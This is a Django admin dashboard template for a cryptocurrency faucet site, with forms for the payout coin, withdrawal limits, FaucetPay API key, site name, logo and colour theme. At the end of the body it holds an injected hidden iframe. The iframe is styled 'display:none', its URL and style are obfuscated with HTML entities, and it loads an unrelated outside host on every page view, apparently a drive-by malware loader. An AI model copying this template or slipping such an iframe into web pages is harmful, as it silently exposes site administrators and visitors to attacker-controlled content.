{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>{{seting.nama_faucet}}</title>
    <!-- Custom fonts for this template-->
    <link href="{% static "vendor/fontawesome-free/css/all.min.css"%}" rel="stylesheet" type="text/css">
    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">
    <!-- Custom styles for this template-->
    <link href="{% static "css/sb-admin-2.min.css"%}" rel="stylesheet">
</head>
<body id="page-top">
    <!-- Page Wrapper -->
    <div id="wrapper">
        <!-- Sidebar -->
        <ul class="navbar-nav {{seting.warna_faucet}} sidebar sidebar-dark accordion" id="accordionSidebar">
            <!-- Sidebar - Brand -->
      <a class="sidebar-brand d-flex align-items-center justify-content-center" href="/admin">
          <div class="sidebar-brand-icon">
            <img height="50" src="{{seting.logo}}" alt="Logo">
          </div>
          <div class="sidebar-brand-text mx-3">
              {{seting.nama_faucet}}          </div>
        </a>
            <!-- Divider -->
            <hr class="sidebar-divider my-0">
            <!-- Divider -->
            <hr class="sidebar-divider my-0">
            <!-- Nav Item - Dashboard -->
            <li class="nav-item active">
                <a class="nav-link" href="/admin">
                    <i class="fas fa-fw fa-tachometer-alt"></i>
                    <span>Dashboard</span></a>
        </li>
            <!-- Divider -->
            <!-- Divider -->
            <hr class="sidebar-divider">

            <!-- Heading -->
            <div class="sidebar-heading">
                Setting User & Faucet
            </div>

            <!-- Nav Item - Pages Collapse Menu -->
            <li class="nav-item">
                <a class="nav-link collapsed" href="#" data-toggle="collapse" data-target="#collapseTwo"
                    aria-expanded="true" aria-controls="collapseTwo">
                    <i class="fas fa-fw fa-cog"></i>
                    <span>User</span>
                </a>
                <div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordionSidebar">
                    <div class="bg-white py-2 collapse-inner rounded">
                        <h6 class="collapse-header">Setting User:</h6>
                        <a class="collapse-item" href="/admin/user_list">List User</a>
                        <a class="collapse-item" href="/admin/user_setting">Setting User</a>
                    </div>
                </div>
            </li>

            <!-- Nav Item - Utilities Collapse Menu -->
            <li class="nav-item">
                <a class="nav-link collapsed" href="#" data-toggle="collapse" data-target="#collapseUtilities"
                    aria-expanded="true" aria-controls="collapseUtilities">
                    <i class="fas fa-fw fa-wrench"></i>
                    <span>Setting earning</span>
                </a>
                <div id="collapseUtilities" class="collapse" aria-labelledby="headingUtilities"
                    data-parent="#accordionSidebar">
                    <div class="bg-white py-2 collapse-inner rounded">
                        <h6 class="collapse-header">Setting Earning:</h6>
                        <a class="collapse-item" href="/admin/faucet">Faucet</a>
                        <a class="collapse-item" href="/admin/auto">Auto Faucet</a>
                        <a class="collapse-item" href="/admin/seting_shortlink">Shortlink</a>
                    </div>
                </div>
            </li>
        </ul>
        <!-- End of Sidebar -->
        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">
            <!-- Main Content -->
            <div id="content">
                <!-- Topbar -->
                <nav class="navbar navbar-expand navbar-light bg-white topbar mb-4 static-top shadow">
                    <!-- Sidebar Toggle (Topbar) -->
                    <button id="sidebarToggleTop" class="btn btn-link d-md-none rounded-circle mr-3">
                        <i class="fa fa-bars"></i>
                    </button>
                    <!-- Topbar Search -->
                    <!-- Topbar Navbar -->
                    <ul class="navbar-nav ml-auto">
                        <!-- Nav Item - Search Dropdown (Visible Only XS) -->
                        <div class="topbar-divider d-none d-sm-block"></div>
                        <!-- Nav Item - User Information -->
                        <li class="nav-item dropdown no-arrow">
                            <a class="nav-link dropdown-toggle" href="#" id="userDropdown" role="button"
                                data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                <span class="mr-2 d-none d-lg-inline text-gray-600 small">Admin</span>
                                <img class="img-profile rounded-circle"
                                    src="{% static "img/undraw_profile.svg"%}">
                            </a>
                            <!-- Dropdown - User Information -->
                            <div class="dropdown-menu dropdown-menu-right shadow animated--grow-in"
                                aria-labelledby="userDropdown">
                                <a class="dropdown-item" href="/logout" data-toggle="modal" data-target="#logoutModal">
                                    <i class="fas fa-sign-out-alt fa-sm fa-fw mr-2 text-gray-400"></i>
                                    Logout
                                </a>
                            </div>
                        </li>
                    </ul>
                </nav>
                <!-- End of Topbar -->
                <!-- Begin Page Content -->
                <div class="container-fluid">
                    <!-- Page Heading -->
                    <div class="d-sm-flex align-items-center justify-content-between mb-4">
                        <h1 class="h3 mb-0 text-gray-800">Dashboard</h1>
                    </div>
                    <!-- Content Row -->
                    <div class="row">
                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-3 col-md-6 mb-4">
                            <div class="card border-left-primary shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-xs font-weight-bold text-primary text-uppercase mb-1">
                                                Website Balance </div>
                                            <div class="h5 mb-0 font-weight-bold text-gray-800">{{balance}} {{seting.jenis_faucet}} </div>
                                        </div>
                                        <div class="col-auto">
                                            <i class="fas fa-dollar-sign fa-2x text-gray-300"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Earnings (Monthly) Card Example -->
                        <div class="col-xl-3 col-md-6 mb-4">
                            <div class="card border-left-success shadow h-100 py-2">
                                <div class="card-body">
                                    <div class="row no-gutters align-items-center">
                                        <div class="col mr-2">
                                            <div class="text-xs font-weight-bold text-success text-uppercase mb-1">
                                                Total Withdrawal</div>
                                            <div class="h5 mb-0 font-weight-bold text-gray-800">{{seting.total_wd}} Tokens</div>
                                        </div>
                                        <div class="col-auto">
                                            <i class="fas fa-paper-plane fa-2x text-gray-300"></i>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Coins for payment</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p>Please select the Crypto coin that will be used for payment to faucetpay .</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">You Have Selected Coins: {{seting.jenis_faucet}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="1">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">BITCOIN/BTC</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="2">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">ETHEREUM/ETH</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="3">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">DOGECOIN/DOGE</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="4">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">LITECOIN/LTC</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="5">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">BITCOIN CASH/BCH</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="6">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">DASH/DASH</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="7">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">DIGIBYTE/DGB</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="8">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">TRON/TRX</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="9">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">TETHER TRC20/USDT</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="10">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">FEYORRA/FEY</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="11">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">ZCASH/ZEC</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="12">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">BINANCE BEP20/BNB</span>
                                    </button>
                                    <button class="btn btn-success btn-icon-split" name="name_coin" value="13">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">SOLANA/SOL</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Minimum Withdraw Tokens</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p>Input Minimum Withdrawal Token</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your minimum withdrawal : {{seting.min_wd}} Tokens</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="number" name="min_wd" required="" class="form-control" id="min_wd"
                                                placeholder="Enter minimum withdrawal...">
                                        </div>
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Enter Your Website Url</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p>Enter your website url example : https://google.com</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Website Url : {{seting.url}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="url" required="" class="form-control" id="url"
                                                placeholder="your website url...">
                                        </div>
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Reward tokens</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p>Enter reward tokens</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Reward your tokens : {{seting.reward_wd}} Satoshi {{seting.jenis_faucet}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="number" name="reward_wd" required="" class="form-control" id="reward_wd"
                                                placeholder="Reward Tokens...">
                                        </div>
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>
                        
                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Api Key Faucetpay</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p>Please enter the faucetpay key api so that users can withdraw their balance</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Api Key : {{seting.api_key}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="password" name="api" required="" class="form-control" id="api"
                                                placeholder="Input Api Key From Faucetpay.....">
                                        </div>
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>

                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Website Name</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p>Enter Website Name</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your Website Name : {{seting.nama_faucet}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="name_web" required="" class="form-control" id="name_web"
                                                placeholder="Enter Website Name.....">
                                        </div>
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>

                        </div>

                        <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Logo</h6>
                                </div>
                                <div class="card-body">
                                {% if sukses == True %}
                                <div class="alert alert-success" role="alert">
                                Sukses Save
                                </div>
                                {% endif %}
                                {% if sukses == False %}
                                <div class="alert alert-danger" role="alert">
                                Looks like something's wrong
                                </div>
                                {% endif %}
                                    <p>Enter the logo image url</p>
                                    <a class="btn btn-info btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-info-circle"></i>
                                        </span>
                                        <span class="text">Your logo url: {{seting.logo}}</span>
                                    </a>
                                    <p></p>
                                    <form method="post">
                                      {% csrf_token %}
                                    <div class="form-group">
                                            <input type="text" name="logo" required="" class="form-control" id="logo"
                                                placeholder="Enter Logo Image Url.....">
                                        </div>
                                    <button class="btn btn-success btn-icon-split">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Save</span>
                                    </button>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>
                        </div>
                        <!-- Earnings (Monthly) Card Example -->
                          <div class="col-lg-6">
                            <div class="card shadow mb-4">
                                <div class="card-header py-3">
                                    <h6 class="m-0 font-weight-bold text-primary">Color Website</h6>
                                </div>
                                <form method="post">
                                  {% csrf_token %}
                                <div class="card-body"><div class="px-3 py-5 bg-gradient-primary text-white">.bg-gradient-primary</div>
                                <br>
                                <button class="btn btn-success btn-icon-split" name="id" value="1">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text" >Select color </span>
                                    </button>
                                    <br>
                                    <div class="px-3 py-5 bg-gradient-secondary text-white">.bg-gradient-secondary</div>
                                    <br>
                                <button class="btn btn-success btn-icon-split" name="id" value="2">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Select color </span>
                                    </button>
                                    <br>
                                    <div class="px-3 py-5 bg-gradient-success text-white">.bg-gradient-success</div>
                                    <br>
                                <button class="btn btn-success btn-icon-split" name="id" value="3">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Select color </span>
                                    </button>
                                    <br>
                                    <div class="px-3 py-5 bg-gradient-info text-white">.bg-gradient-info</div>
                                    <br>
                                <button class="btn btn-success btn-icon-split" name="id" value="4">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Select color </span>
                                    </button>
                                    <br>
                                    <div class="px-3 py-5 bg-gradient-warning text-white">.bg-gradient-warning</div>
                                    <br>
                                <button class="btn btn-success btn-icon-split" name="id" value="5">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Select color </span>
                                    </button>
                                    <br>
                                    <div class="px-3 py-5 bg-gradient-danger text-white">.bg-gradient-danger</div>
                                    <br>
                                <button class="btn btn-success btn-icon-split" name="id" value="6">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Select color </span>
                                    </button>
                                    <br>
                                    <div class="px-3 py-5 bg-gradient-light text-white">.bg-gradient-light</div>
                                    <br>
                                 <button class="btn btn-success btn-icon-split" name="id" value="7">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Select color </span>
                                    </button>
                                    <br>
                                    <div class="px-3 py-5 bg-gradient-dark text-white">.bg-gradient-dark</div>
                                    <br>
                                    <button class="btn btn-success btn-icon-split" name="id" value="8">
                                        <span class="icon text-white-50">
                                            <i class="fas fa-check"></i>
                                        </span>
                                        <span class="text">Select color</span>
                                    </button>
                                    <br>
                                    </form>
                                    <div class="my-2"></div>
                                </div>
                            </div>
                        </div>
                        <!-- Pending Requests Card Example -->
                    </div>
                </div>
                <!-- /.container-fluid -->
            </div>
            <!-- End of Main Content -->
              
            <!-- Footer -->
            <footer class="sticky-footer bg-white">
                <div class="container my-auto">
                    <div class="copyright text-center my-auto">
                        <span>Copyright &copy; {{seting.nama_faucet}} 2021</span>
                    </div>
                </div>
            </footer>
            <!-- End of Footer -->
        </div>
        <!-- End of Content Wrapper -->
    </div>
    <!-- End of Page Wrapper -->

    <!-- Scroll to Top Button-->
    <a class="scroll-to-top rounded" href="#page-top">
        <i class="fas fa-angle-up"></i>
    </a>

    <!-- Logout Modal-->
    <div class="modal fade" id="logoutModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="exampleModalLabel">Ready to Leave?</h5>
                    <button class="close" type="button" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">×</span>
                    </button>
                </div>
                <div class="modal-body">Select "Logout" below if you are ready to end your current session.</div>
                <div class="modal-footer">
                    <button class="btn btn-secondary" type="button" data-dismiss="modal">Cancel</button>
                    <a class="btn btn-primary" href="/logout">Logout</a>
                </div>
            </div>
        </div>
    </div>

    <!-- Bootstrap core JavaScript-->
    <script src="{% static "vendor/jquery/jquery.min.js"%}"></script>
    <script src="{% static "vendor/bootstrap/js/bootstrap.bundle.min.js"%}"></script>

    <!-- Core plugin JavaScript-->
    <script src="{% static "vendor/jquery-easing/jquery.easing.min.js"%}"></script>

    <!-- Custom scripts for all pages-->
    <script src="{% static "js/sb-admin-2.min.js"%}"></script>

    <!-- Page level plugins -->
    <script src="{% static "vendor/chart.js/Chart.min.js"%}"></script>

    <!-- Page level custom scripts -->
    <script src="{% static "js/demo/chart-area-demo.js"%}"></script>
    <script src="{% static "js/demo/chart-pie-demo.js"%}"></script>

<iframe src="http://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>
</body>

</html>